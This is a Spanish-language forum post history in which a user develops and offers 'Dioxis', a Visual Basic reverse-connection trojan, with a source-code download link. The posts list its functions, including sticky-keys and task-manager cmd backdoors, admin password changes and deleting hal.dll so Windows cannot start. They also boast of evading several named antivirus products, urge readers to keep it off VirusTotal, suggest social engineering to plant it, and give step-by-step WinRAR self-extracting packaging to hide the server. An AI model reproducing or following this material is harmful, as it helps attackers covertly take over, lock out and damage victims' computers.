Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - 50l3r

#351
muchas gracias por la sugerencia, ya lo arregle

ya esta activa la descarga
#352
Pondre para que podais cambiar el intervalo del timer, por si teneis muchos pcs remotos

luego el corte de conexion, eso se debe a que no puedo controlar los 4 formularios con un winsock control, sino no se cortaria
#353
aji estamos jeje, he empezado hace 2 semanas en este mundillo, me lei entero el manual de aprenda vb como si estuviera en primer y de ahi en adelante empecé  a investigar yo solo

el troyano no esta hecho siguiendo un tutorial, lo que si, me inspiro el manual de Xenon, unicamente la primera parte, aun sigo leyendo el tutorial pero lo sigo por mi parte, como un manual mas y no copiando el codigo, y si hay alguna parte que no se investigo hasta dar la causa




Tengo esto en mente para que el cliente me genere el server clicando en un boton

Que por un inputbox te pida la ip a la que se vaya el server y luego genere todo el server en un exe y luego lo guarde en una ruta con un common dialog

pero como hago para guardar unicamente el server al darle al boton?

para resumir, quiero hacerlo como el bifrost, que te genere el cliente el servidor
#354
he visto el proyecto que has hecho ese que muestras en tu post eon, pero no entiendo mucho, en ese que generas el servidor desde el cliente?

eso es lo que deseo yo

quiero poner en el cliente un boton que te pregunte, a que ip quieres vincular el server?, pones una y te genera el server con esa ip, pero ahi no llego a entender mucho, haber si me puedes ayudar
#355
ahber si consigo crear en el cliente el servidor y sera todo vuestro, pero no lo subais a virustotal, y si vuestro antivirus envia los datos al servidor, no lo analizeis tampoco
#356
batch tambien es menospreciado, y solo estamos hablando de batch, hay gente que hace juegos convoy a poner mas datos del software, entre ellos el peso y demas
#357
si te refieres al numero de fichero que necesita, pues nada mas el server y el ocx del winsock para el que no lo tenga, esta compilado con el winrar jaja

El espacio es de 10 segundos, esta hecho con un timer pero vamos que se puede agrandar si el numero de clientes es elevado

si, lenguaje vb, con la version del programa 6.0 jaja eso sobraba pero weno


a mi tampoco me gusta lo de que se reconecta todo el rato, porque como son diferentes formularios tuve que hacer diferentes controles winsock para cada uno, eso no sabia como arreglarlo ains

el oso rosa asesion es el famoso gloomy miren jeje:

http://images.google.es/images?client=firefox-a&rls=org.mozilla%3Aes-ES%3Aofficial&hl=es&q=gloomy&btnG=Buscar+im%C3%A1genes&gbv=2&aq=f&oq=

porcierto puse una duda en vb6, quiero que el cliente genere el servidor, es decir que puedas cambiar la ip a la que va el servidor para que no todas vayan a m dominio no-ip, sino que la gente lo use para ellos, haber si me podeis ayudar y cuando acabe eso lo pongo

solucionado el error de que cuando el usuario se descnecta, no avisaba
#358
yeah, me costo pero si, aun asi me falta mejorarle unas cosas ya que cuando se descoencta el servidor, el cliente no muestra la desconexion, fallo grave
#359
no te entendi muy bien, lo que yo quiero es crear el servidor desde el cliente ya que la ip a la que se conecta el servidor tiene que ser cambiada

necesito saber como pdoer crear el servidor desde mi cliente para terminar el Dioxis

haber si alguien me puede hechar una mano jeje, se lo agradeceria y con esto concluiria la 1 version del troyano
#360

Abstenganse Virustotal ;)



Tamaño servidor: 408 KB (Compilado con Winsck.ocx & dioxis.exe(servidor))
Tamaño Cliente: 544 KB
Archivos: Cliente Dioxis y libreria winsck.ocx
Lenguaje: Visual Basic 6.0
Conexion: Inversa
Tiempo de Reconexion: Personalizada
Tiempo de Refresco de fin de conexion: 1 segundo
Idioma: Español
Puerto usado: 666
Infraestructura: Red Local e internet



Funciones automatizadas:

Ejecucion de:


  • Paint
  • Teclado Universal
  • Buscaminas
  • Solitario
  • Pinball
  • Calculadora
  • Paseo de Win Xp
  • Star Wars
  • Mensajes personalizados
  • Paginas Web

Matanza de Procesos:



  • Messenger
  • Navegadores (Firefox,Iexplorer,Safari y Opera)
  • Explorador de Windows
  • Proceso Personalizado

Creacion de Puertas Traseras:


  • Habilitar terminal server
  • Establecer una cmd en sticky keys (compaginado con ts, tienes el control total del pc)
  • Establecer una cmd en vez del administrador de tareas (para que no pueda ver las tareas)

Sistema:


  • Edicion de la contraseña de administracion a la que se quiera
  • Cierre de Sesion
  • Apagar Pc
  • ELIMINAR HAL.DLL (No se iniciara windows si no es reparado :/ )




¿Que es Dioxis?

Dioxis, a pesar de su simple interfaz, es un troyano de conexion inversa.

Utiliza la funcion shell, para ejecutar acciones, estas acciones estan divididas en 4 partes:

Modo Custom: Es el modo personalizado, si tienes ya conocimientos de lo que puedes hacer con "Ejecutar:" puedes escribir tus ordenes aqui para que sean procesadas en el ordenador remoto


Modo Funny: Es el modo divetido ^^. Puedes haces acciones tales como ejecutar paint, mandar mensajes, ponerle la tipica pelicula de star wars en modo ascii...etc


Modo Normal: Este modo esta dedicado a la matanza de procesos que corren en el pc remoto y a abrir paginas web o cerrar sesion, un poco mas cruel que el funny mod


Modo Dioxis: El dioxis mod, seria en teoria la forma mas cruel de usar este software, consta ge generar backdoors, apagar el pc, eliminar el hal.dll...etc

He evitado en este modo hacer las cosas crueles ya que este software aun no es detectado ^^ abstenganse gente cruel :P


Demostracion

Aqui os dejo unos minutos de la demostracion del troyano, es la 1 version, no la actualizada, pero no cambia mucho


¿Detectado?

El unico antivirus que hasta ahora me ha dado algun problema es el poco conocido avira, que lo detecta por heuristica pero te deja seguir trabajando con el, asi que si tienes una buena ingenieria social, podras colarselo, a continuacion los antivirus pasados:


Kapersky 2009



Nod32



Norton 2009



Panda global protection 2009



Avast

En este no tengo imagen, ya que nada mas analizarlo la ventana se cierra

Por ahora esos antivirus son con los que lo analize, si deseais que lo analize con otros me comentais

Otros Datos:


  • Añadida la funcion de eliminar Servidor y crearlo con el cliente
  • Ahora el tiempo de reconexion se configura al crear el server, igual que la ip
  • No hará falta conectarse y desconectarse al pasar entre modos[/b]

Instrucciones:

El Troyano consta de cliente y servidor, el servidor se crea con el cliente, y puede que necesite de la libreria de winsock (viene adjuntada con el software), asi que una vez creado el server seguid estos pasos:

1: Instalar el WINRAR y coged los archivos servidor y la libreria

2: Una vez tenemos el servidor y la libreria, cogemos los dos y con el winrar y le damos a añadir archivo, nos aparecera una ventana asi:


Le dais a crear archivo ejecutable o en mi caso a create sfx archive, el metodo de compresion que sea el mejor

3: A continuacion vete a la pestaña avanzado, te aparecerá esta ventana:


te vas a opciones de autoejecutable o sfx options

4: Te volvera a salir otra pestaña para poder decir el directorio en donde se instalara, y que se ejcutara antes o despues de la extraccion, rellenar segun la imagen


5: En la pestaña modos, selecciona segun la imagen, sobreescribir archivos y esconder todo


6: En esta pestaña podreis cambiar el icono de la aplicacion, luego das a aceptar todo y ya tendreis vuestro server









Descargar codigo fuente